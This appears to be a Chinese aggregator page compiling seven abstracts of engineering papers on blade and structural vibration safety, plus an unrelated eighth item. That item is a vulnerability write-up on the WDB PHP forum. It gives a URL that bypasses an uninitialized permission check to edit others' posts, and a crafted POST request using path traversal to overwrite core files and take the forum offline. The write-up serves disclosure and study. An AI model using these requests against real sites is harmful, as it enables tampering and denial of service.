通风机叶片振动安全性分析

| 收藏本文 下载本文 作者:kamijiang

以下是小编整理的通风机叶片振动安全性分析(共含8篇),仅供参考,希望能够帮助到大家。同时,但愿您也能像本文投稿人“kamijiang”一样,积极向本站投稿分享好文章。

通风机叶片振动安全性分析

篇1:通风机叶片振动安全性分析

通风机叶片振动安全性分析

摘要:针对传统的`叶片振动安全性调频分析方法的4种局限性,提出了一种叶片振动安全性动应力分析法.该方法可在实际动载荷未知的情况下,进行叶片动应力及叶片振动安全性分析.本文介绍了叶片振动安全性动应力分析法的特点,并通过实例说明了该方法的可行性. 作者: 陈杰[1]  沈荣瀛[2]  华宏星[2]  罗建平[3] Author: CHEN Jie[1]  SHEN Rong-ying[2]  HUA Hong-xing[2]  LUO Jian-ping[3] 作者单位: 上海交通大学核电技术与装备工程研究中心,30;上海交通大学振动冲击噪声实验室,200030上海交通大学振动冲击噪声实验室,200030上海交通大学上风高科工程技术中心,200030 期 刊: 核动力工程   ISTICEIPKU Journal: NUCLEAR POWER ENGINEERING 年,卷(期): , 27(5) 分类号: HT11 关键词: 通风机    叶片振动    安全分析    动应力    机标分类号: TM8 O34 机标关键词: 通风机    叶片振动    安全性分析    动应力    力分析法    分析方法    局限性    动载荷    调频 基金项目: 通风机叶片振动安全性分析[期刊论文]  核动力工程 --2006, 27(5)陈杰  沈荣瀛  华宏星  罗建平针对传统的叶片振动安全性调频分析方法的4种局限性,提出了一种叶片振动安全性动应力分析法.该方法可在实际动载荷未知的情况下,进行叶片动应力及叶片振动安全性分析.本文介绍了叶片振动安全性动应力分析法的特点,并通过...

篇2:建筑结构振动安全性研究

建筑结构振动安全性研究

以凤滩水力发电厂一副厂房为例,基于梁元和壳元建立空间有限元仿真模型计算了厂房的动力特性和几种工况下的动力响应,并进行了相应工况的动态测试,对测试结果与计算成果进行了比较.研究表明,测试结果可靠,分析模型正确,找到了该厂房砖混结构开裂为振动过大所致,提出了相应的.振动控制策略,为类似结构的振动安全性研究提供了参考.

作 者:李星新 贺国京 黄智慧 汪建文 LI Xing-xin HE Guo-jing HUANG Zhi-hui WANG Jian-wen  作者单位:李星新,LI Xing-xin(中铁大桥集团武汉桥科院有限公司,湖北,武汉,430034)

贺国京,HE Guo-jing(中南林业科技大学,湖南,长沙,410004)

黄智慧,汪建文,HUANG Zhi-hui,WANG Jian-wen(凤滩水力发电厂,湖南,沅陵,419600)

刊 名:世界地震工程  ISTIC PKU英文刊名:WORLD EARTHQUAKE ENGINEERING 年,卷(期): 23(4) 分类号:P315 关键词:空间模型   动态测试   振动  

篇3:航空发动机转子叶片三维有限元振动特性分析

航空发动机转子叶片三维有限元振动特性分析

叶片是航空发动机的主要零件之一,结构及承载情况十分复杂.在实际使用中,由于叶片的振动破坏而造成发动机失效甚至飞机失事的例子时有发生.因此,对叶片的振动特性分析就显得尤为重要.根据叶片的实体结构建立了叶片的三维有限元模型,编制了叶片振动特性分析的有限元程序(Fortran语言,约8000余句).采用子空间迭代法计算叶片的频率.利用开发的`软件对影响压气机叶片振动特性的几个因素进行了分析.经算例考核证明,计算模型和程序是正确的、有效的,具有较高的计算精度.为转子叶片的疲劳损伤及可靠性分析,提供了一个有效的、灵活的研究手段,具有应用价值.

作 者:贺威 黄宝宗 HE Wei HUANG Bao-zong  作者单位:沈阳农业大学,高等职业技术学院,沈阳,110004 刊 名:沈阳农业大学学报  ISTIC PKU英文刊名:JOURNAL OF SHENYANG AGRICULTURAL UNIVERSITY 年,卷(期): 37(5) 分类号:V232.4 关键词:叶片   静频   动频   振动特性   有限元  

篇4:低压压气机转子叶片振动特性计算与分析

低压压气机转子叶片振动特性计算与分析

利用优化的八节点超参数单元法对某型发动机低压压气机转子叶片的振动特性进行了计算分析,并结合转子结构和发动机工作状态深入分析了可能发生的危险共振情况,发现第二级转子叶片抗振性能不好,为转子叶片的在线监测与故障预报提供了重要依据.

作 者:金业壮 杜少辉 闻邦椿 JIN Ye-zhuang DU Shao-hui WEN Bang-chun  作者单位:金业壮,JIN Ye-zhuang(东北大学,沈阳,110015;沈阳航空工业学院,航空宇航学院,沈阳,110034)

杜少辉,DU Shao-hui(沈阳发动机设计研究所,沈阳,110015)

闻邦椿,WEN Bang-chun(沈阳航空工业学院,航空宇航学院,沈阳,110034)

刊 名:机械设计与制造  ISTIC PKU英文刊名:MACHINERY DESIGN & MANUFACTURE 年,卷(期):2006 “”(12) 分类号:V231.92 关键词:压气机   振动特性   有限元法   共振分析  

篇5:燃气轮机叶片-轮盘耦合振动特性计算

燃气轮机叶片-轮盘耦合振动特性计算

建立了叶片-轮盘耦合系统振动固有特性计算分析模型,利用有限元通用程序NASTARN的循环对称分析功能和几何非线性分析功能,对某舰用燃气轮机叶片-轮盘结构进行计算分析.计算中考虑了旋转离心力及材料参数随温度变化对固有特性的'影响,得到的谐波共振频率与实测结果基本吻合.

作 者:周传月 邹经湘 闻雪友 盛惠渝 Chuan yue ZOU Jing-xiang WEN Xue-you SHENG Hui-yu  作者单位:周传月,邹经湘,Chuan yue,ZOU Jing-xiang(哈尔滨工业大学,航天工程与力学系,黑龙江,哈尔滨,150001)

闻雪友,盛惠渝,WEN Xue-you,SHENG Hui-yu(哈尔滨第七O三研究所,黑龙江,哈尔滨,150036)

刊 名:航空学报  ISTIC EI PKU英文刊名:ACTA AERONAUTICA ET ASTRONAUTICA SINICA 年,卷(期): 21(6) 分类号:V231.92 关键词:叶片   轮盘   耦合振动   有限元  

篇6:压气机叶片的振动疲劳特性

压气机叶片的振动疲劳特性

首次报道了关于采用11CrNi2MoVA材料制造的某型航空发动机压气机第3级叶片振动疲劳特性的研究.结果发现:(1)叶片振动疲劳破坏模式随使用寿命增加而变化.新叶片的破坏位置在叶背最大应力点附近处,而随着使用寿命的增加,叶片破坏位置转向进排气边缘.(2)叶片振动疲劳强度随使用寿命增加而逐渐下降.采用升降法对新叶片、200小时、400小时叶片的实验结果证实了这一点.(3)采用现行方法对叶片的.维修有利于叶片疲劳强度的恢复.对使用寿命为400小时的未维修叶片和已完成维修叶片的对比实验表明,维修可使叶片疲劳强度提高,但叶片破坏位置仍在叶片的进排气边缘.

作 者:康继东 徐志怀 陈士煊 Kang Jidong Chen Shixuan Xu Zhihuai  作者单位:南京航空航天大学 刊 名:航空动力学报  ISTIC EI PKU英文刊名:JOURNAL OF AEROSPACE POWER 年,卷(期): 14(1) 分类号:V231.95 关键词:压气机   叶片   振动   疲劳强度  

篇7:疲劳裂纹叶片振动的非线性特性研究

疲劳裂纹叶片振动的非线性特性研究

以带疲劳裂纹悬臂梁为例研究疲劳裂纹对叶片固有频率及强迫振动响应的.影响.应用传递矩阵法求解裂纹叶片振动响应,选用余弦函数模拟疲劳裂纹的开合过程,理论分析了裂纹叶片的非线性振动特性,并进行裂纹试件实验.理论分析及实验结果都表明疲劳裂纹不仅使悬臂梁的固有频率下降,而且引起强迫振动响应的非线性特征.最后,就叶片裂纹故障监测特征量的选取做了分析、讨论.

作 者:杨海燕 杨秉玉 刘启州 Yang Haiyan Yang Binyu Liu Qizhou  作者单位:西北工业大学 刊 名:西北工业大学学报  ISTIC EI PKU英文刊名:JOURNAL OF NORTHWESTERN POLYTECHNICAL UNIVERSITY 年,卷(期):1999 17(2) 分类号:V2 关键词:叶片   疲劳裂纹   振动特性   监测特征量  

篇8:水晶论坛(WDB)安全性分析

生活真的很有意思,当你觉得一切顺利得让你满意得不能再满意的时候,那么你的不幸可能很快就会来了,而当你觉得你的生活中充斥着不幸,很多事情不断得使你感到痛苦甚至畏惧的时候,事态却突然转变,一切恢复到了以往的平静。当自己觉得一切异乎寻常的顺利或者经受着生活给我那“非常痛苦”的时候,我就会逼着自己去读一些代码,读代码的时候可以感受到平和,平和的思考问题,平和的处理事情。于是就有了这篇文章。

Wdbpost.php逻辑错误

这个漏洞可以导致攻击者可以修改任意用户的的贴子,下面来看详细分析:

1.涉及版本和平台。

受影响版本:水晶论坛(WDB)的当前所有版本。

受影响操作系统:Windows、Freebsd、Linux(我只测试了这三种操作系统,有兴趣的朋友可以自行测试)。

2.漏洞分析。

由于wdbpost.php文件中存在变量未初始化,导致恶意攻击者绕过wdbpost.php的验证,任意修改编辑别人的贴子。我们来看一下相关的代码:

=======codz begin======

488 if ($action==“modify”) {

......

//------Check if the user got the right to modify--------

499 if ($login_status==1 && ($author==$username || $username==$admin_name || ($login_status==1 && ($forum_admin && in_array($username,

450 $forum_admin))))) $check_user=1;

451

452 if ($check_user==0) { //check_user没有初始化!可以直接定义!

453 $status=“您没有权利修改该贴,请您以合适的身份登录(文章原作者 或者 管理员)”;

454 include(“header.php”);

455 navi_bar($navi_bar_des,$navi_bar_l2,“发生错误”);

456 print_err();

457 include(“footer.php”);

458 exit;

459 }

=======codz ends=========

我们一句一句来读一下看看:当$action等于modify的时候,如果$login_status==1,$login_status这个变量是检查是否登陆,并且当发贴者($author)等于现在的$username或者username等于管理员的名字(admin_user),或者是斑竹($forum_admin && in_array($username,$forum_admin),如果满足这几个条件,那么设定$check_user这个变量等于1,后面就轻松了,如果$check_user这个变量不等于1,那么就说明你没有编辑的权利。到了这里,我们顺着程序员的思路走一遍,觉得没什么问题,一切都很正常,限定的也很严格,真的是这样么?

我们注意到,如果他所规定的条件全部满足的话,那么$check_user=1,后面则检查这个变量是不是为0。我们把这个文件从头看一遍,发现前面并没有定义$check_user这个变量的值,要是我们来设定的话,是不是就可以绕过他的层层检查了呢?

我们来试试看,直接提交:

127.0.0.1/myhome/wdb/wdbpost.phpaction=modify&forumid=5&filename=f_366&article=0&check_user=1

注意这里我直接设定check_user=1。

我们看到了修改的画面,一切都那么顺利,总觉得有点不对劲,修改提交一下看看。

报错!刚才的欣喜一下子被冲淡了,再次拿起代码往下读:

=======codz begin=======

520 elseif($step==2) {

521 if (!$usericon) $usericon=$oldicon;

522 //----Check-------

523 $check=check_data();

524 if ($check) {

$timeedit=getfulldate($timestamp);

$articlecontent=$articlecontent.“

[此贴被”.$username.“在”.$timeedit.“动过手脚]”;

$articlecontent=str_replace(“ ”,“ ”,$articlecontent);

$articlecontent=stripslashes($articlecontent); $articletitle=stripslashes($articletitle);

$articletitle=str_replace(“,”,“,”,$articletitle); $articletitle=safe_convert($articletitle);

......

=======codz ends========

我们注意到那个check_data()的函数看起来比较可疑,拿出来看看,这个函数在post_global.php文件中,翻出这个文件:

=======codz begin=======

350 function check_data(0=“post”) {

351 global

352 $articlecontent,$max_post_length,$articletitle,$status,$articledes,$selections,$title,

353 $by,$address,$downaddress,$file_size,$logourl;

354 $check=1;

355 if (strlen($articlecontent)>=$max_post_length) {$status=“文章超过管理员指定的长度”; $check=0;}

356 if (empty($articletitle)) {$status=“没有填写标题”; $check=0;}

357 elseif (strlen($articletitle)>=80) {$status=“标题太长了”; $check=0;}

358 if (strlen($articledes)>=80) {$status=“文章描述太长了”; $check=0;}

359 if (0==“vote” && empty($selections)) {$status=“不接受空选项”; $check=0;}

......

=======codz ends========

这个函数是检查文章的标题和内容是否为空,长度是否超过指定的长度。从这里看我们要直接提交修改的内容和题目,直接在URL中提交:

127.0.0.1/myhome/wdb/wdbpost.php?action=modify&forumid=5&filename=f_366&article=0&check_user=1&step=2&articletitle=hello,I am Jambalaya&articlecontent=I am from www.itaq.org

其中$articletitle是我们修改的文章标题,$articlecontent是我们修改的文章内容。提交后贴子标题就被改成了“hello,I am Jambalaya。”,而内容则是“I am from www.itaq.org”,

buy.php变量过滤不严

这个变量过滤不严格可以直接导致DOS攻击,我们来看详细分析:

测试环境:windows2000+IIS5(其他没有测试,有兴趣的朋友可以自行测试一下)。

这个文件的问题我一直不想写,不是因为这个漏洞有多严重,而是我觉得这个文件应该可以向里面写入一个Shell而并不仅仅是一个DOS,可是在N次的失败后,自己也迷茫了,继续研究下去需要时间和精力,而这些正是我现在没有的,于是写出来给大家看看,

谁有解决的方法或者认为根本无法写入Shell的理由,希望不吝赐教一下!

由于buy.php文件对变量没有严格过滤,导致可以向任何文件写入垃圾信息导致DOS攻击,严重者可以使整个论坛瘫痪!我们来看一下相关的代码:

=======codz begin=======

17 if (!file_exists(“$id_unique/$buyer”)||!file_exists(“{$idpath}forum$forumid/$filename”)||$buyer!=$username||

18 $buyer==$seller||$sellmoney>100||$sellmoney<0) {

19 msg_box('购买贴子','

状态:发生错误,不要黑我啊

返回前页

20

现在登录

');exit;}

21 if (!file_exists(“$id_unique/$seller”)) {

22 msg_box('购买贴子','

状态:发生错误,出售贴子的人已经注销了~

返回前页

现在登录

');

24 exit;}

25 $useri=get_user_info($buyer);

26 $userii=get_user_info($seller);

27 if($useri[23]<$sellmoney)

28 {

29 echo $useri[23];

30 echo $sellmoney;

31 msg_box('购买贴子','

状态:有没有搞错,你的哪来那么多钱???多灌点水吧,要不就去赌馆碰碰运气

32 ~

返回前页

重新登录

32

');

33 exit;

34 }

35

36 $useri[23]=$useri[23]-$sellmoney;

37 $uu=implode('|',$useri);

38 writetofile(“$id_unique/$buyer”,$uu);

39

40 $userii[23]=$userii[23]+$sellmoney;

41 $uuu=implode('|',$userii);

42 writetofile(“$id_unique/$seller”,$uuu);

========codz ends========

代码有些长,不过很简单。老规矩,我们一句句的看一下:他首先检查购买者是否存在,然后检查你买的那个文件是不是也存在,然后检查买贴子的人名字是不是你现在使用的用户,再然后确定买贴子的人不能是卖贴子的人,并且出售的钱不能大于100,或者小于0。如果上面的一个条件不符合,则报错。这就是检查机制,说起来觉得很累,并且咋看起来似乎检查得很严,检查得的确很严,可惜没检查到位,我们继续往下看。

后面有一个函数来读取用户的信息get_user_info(),我们先来看一下这个函数的:

=======codz begin========

14 function get_user_info($user) {

15 global $id_unique;

15 if(!file_exists(“$id_unique/$user”)||$user==“.”||$user==“..”||$user==“”) return 0;

16 $useri=explode(“|”,readfromfile(“$id_unique/$user”));

17 return $useri;

18 }

========codz ends========

他检查了是否存在这个用户,然后要求用户不能是“.”、“..”这些特殊字符,过滤这些就够了么?显然是不够的。好了,这些都明确了,我们构造我们的语句,如何构造呢?前面的代码对$seller这个值一点都没有做检查,我们就用从这里下手吧。设seller=../ads.php,因为是post提交的,所以先用NC抓个包看看,得到结果:

POST /myhome/wdb/buy.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, */*

Referer: 127.0.0.1/myhome/wdb/wdbread.php?forumid=1&filename=f_14

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Host: 127.0.0.1

Content-Length: 57

Connection: Keep-Alive

Cookie: lastvisit=978449234; wdbadminid=Jambalaya; wdbadminpwd=3028879ab8d5c87dc023049fa5bb5c1a; s=186a44d9c20358034ed9fdb7a038a60c

sellmoney=2&buyer=tombkeeper&seller=Jambalaya&forumid=1&filename=f_14

我用tombkeeker这个id来买帖子(tombkeeper不会找我要版权吧?),我们把seller的名字改一下,改成../ads.php,再用NC提交,显示提交成功!访问一下ads文件,已经访问不了了。现在只是这一个文件不能访问而已,我们怎么能让整个论坛瘫痪呢?其实我们应该注意到,有几个重要文件是很多文件在代码开始的时候都要include的,如果include失败,那么文件也就不能解释执行了,是不是有点釜底抽薪的味道?这种文件有:

datafile/superadmin.php

config.php

global.php

这几个文件是经常在代码开始的时候被include。好,让我们试试datafile/superadmin.php这个文件,同样把seller改成../datafile/superadmin.php,改了变量,用NC提交,返回的信息告诉我失败!当时的感觉就像一盆冷水倾头而下,自己冷静了一下,弄了杯凉白开(我最喜欢喝的东西),两眼盯着屏幕开始发呆。

当问题发生的时候,考虑问题的方法就显得特别重要,首先我假设是我代码没看仔细,于是翻过头来又看了一遍代码,似乎没有什么地方有问题,说明不是代码的问题。反复提交了N次后,在第N+1次的时候发现问题了!我提交的../datafile/superadmin.php神奇地变成了../datafile/su,后面的东西都没有了,找到发生问题的地方了,轻轻的吐了口气,那么后面该怎么做呢?我注意到了NC得到的这行返回信息:Content-Length: 57,我觉得百分之九十应该是长度问题。试试看,把提交的长度57改成了70,再次提交!好了,成功了!Ladys and gentlemans, We got it!(此处转自《萨**历险记》)。

回头看看论坛,已经不能访问了。这里只是举个例子,如果攻击者心狠手辣的话,写个程序往所有重要文件里写入垃圾数据并且将其写满也不是不可以的,所以才叫DOS嘛!

文章写到这里基本上就可以结束了,后面就是我测试失败的地方,其实我却觉得应该可以实现的,时间和精力都没有的时候,我还是写出来给大家讨论吧:如果大家仔细读一下代码就可以发现,其实$sellmoney这个变量也没有定义,并没有定义这个变量一定要是数值型,而对于PHP这种松散的语法类型来说,如果我提交的是字符串,则会自动转换成数值0,我们来从头看一下代码:程序进行了几次比对,然后将其写入文件,如果我们将$sellmoney定义为php的语句是不是可以写入文件然后调用解释执行呢?后面的东西这里不去详述了,省得哪位小编哥哥说我有骗稿费的嫌疑。

文章已经写完了,逻辑错误和思维定式是所有论坛都会存在的问题。不是没有漏洞,只是你没有看到而已。PHP编译器的确用了很多保护方法,但是代码本身的不安全性就像一颗深埋的炸弹一样――总有一天会暴露出来,只不过是时间问题罢了。

建筑结构振动安全性研究

水晶论坛(WDB)安全性分析

通风机使用安全规定?

手机用振动马达项目可行性分析报告

叶片的结构

铁路振动影响及其减振措施的分析

转基因作物安全性研究进展

振动消除应力技术应用研究

深圳一大厦有振动

周宁水电站安全性评价工作

通风机叶片振动安全性分析(通用8篇)

欢迎下载DOC格式的通风机叶片振动安全性分析,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式

猜你喜欢

NEW
点击下载本文文档